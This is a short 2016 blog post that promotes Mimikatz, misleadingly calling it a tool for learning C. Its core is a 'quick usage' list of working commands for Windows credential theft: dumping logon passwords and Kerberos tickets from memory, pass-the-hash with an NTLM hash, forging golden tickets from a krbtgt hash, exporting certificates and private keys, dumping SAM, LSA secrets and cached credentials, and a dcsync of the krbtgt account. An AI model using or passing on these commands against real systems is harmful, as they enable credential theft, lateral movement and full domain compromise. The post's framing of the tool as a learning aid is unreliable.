Sunday 14 February 2016
0 comments
17:55:00

Mimikatz C Learning Tool And Also To Do Experiments With Windows Security

Mimikatz C Learning Tool And Also Do Experiments With Windows Security


Mimikatz C Learning Tool


Definition: For learning C language we used mimikatz. it is a tool by which we can easily learn C programming language and can also do experiments with Windows security.


What can mimikatz do?

Mimikatz can perform many things, among them the most popular are:

  1. It can extract plaintexts passwords
  2. Hashing
  3. PIN code and kerberos tickets from memory
  4. It can also perform pass-the-hash
  5. Along with that it can also performpass-the-ticket or build Golden tickets.

Latest Release:

2.1 alpha 20160208 (oe.eo) edition has been released 6 days ago.

Quick usage:

For the usage purpose you can use it like below:

log
privilege::debug

sekurlsa

sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden/admin:administrateur/domain:chocolate.local/sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 

/ticket:chocolate.kirbi

crypto

crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates/export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump

vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Build:

Prerequisites for mimikatz tool are: is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:

  1. It needs Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64).
  2. It also require Windows Driver Kit 7.1 (WinDDK) for mimikatz driver.

For Building the solution:

Open the solution and you can change the architecture also Build / Build Solution.
After that it is ready to installed.

Licence:

0 comments:

Post a Comment

Note: only a member of this blog may post a comment.

 
Toggle Footer
Top